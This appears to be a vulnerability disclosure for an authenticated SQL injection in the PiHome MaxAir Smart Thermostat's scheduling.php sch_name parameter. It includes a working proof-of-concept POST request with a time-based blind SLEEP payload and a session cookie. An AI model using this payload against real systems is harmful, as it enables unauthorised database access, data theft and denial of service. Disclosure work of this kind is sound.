Description:

A security vulnerability has been identified in the *PiHome MaxAir Smart
Thermostat* system that permits an authenticated attacker to execute
arbitrary SQL statements against the backend database.

The issue resides in the scheduling.php component, specifically in how the
sch_name POST parameter is handled. The application fails to properly
sanitize user-supplied input, allowing for SQL injection via crafted
payloads. This flaw enables a remote authenticated user to exfiltrate
sensitive information, manipulate records, or perform denial-of-service
operations (e.g., time-based blind injection)


Technical Details:

*Vulnerable Endpoint:*
scheduling.php

*Vulnerable Parameter:*
sch_name

*Attack Vector:*

Authenticated HTTP POST Request.

Proof of Concept (PoC):

POST /scheduling.php HTTP/1.1
Host: 127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=51i6c6j0dcnlhgrqtt76gbb5eo; PiHomeLanguage=en

Monday_en=1&Friday_en=1&sch_name='+AND+(SELECT+1523+FROM+(SELECT(SLEEP(5)))ZNqW)+AND+'QgEj'='QgEj&start_time_state=0&start_time=21:24&end_time_state=0&end_time=21:22&submit=Submit

*Explanation:*
The sch_name parameter is vulnerable to SQL injection. The payload in the
example above will cause a 5-second delay in server response if the
injection is successful, demonstrating time-based blind SQLi. The presence
of such behavior confirms arbitrary SQL query execution.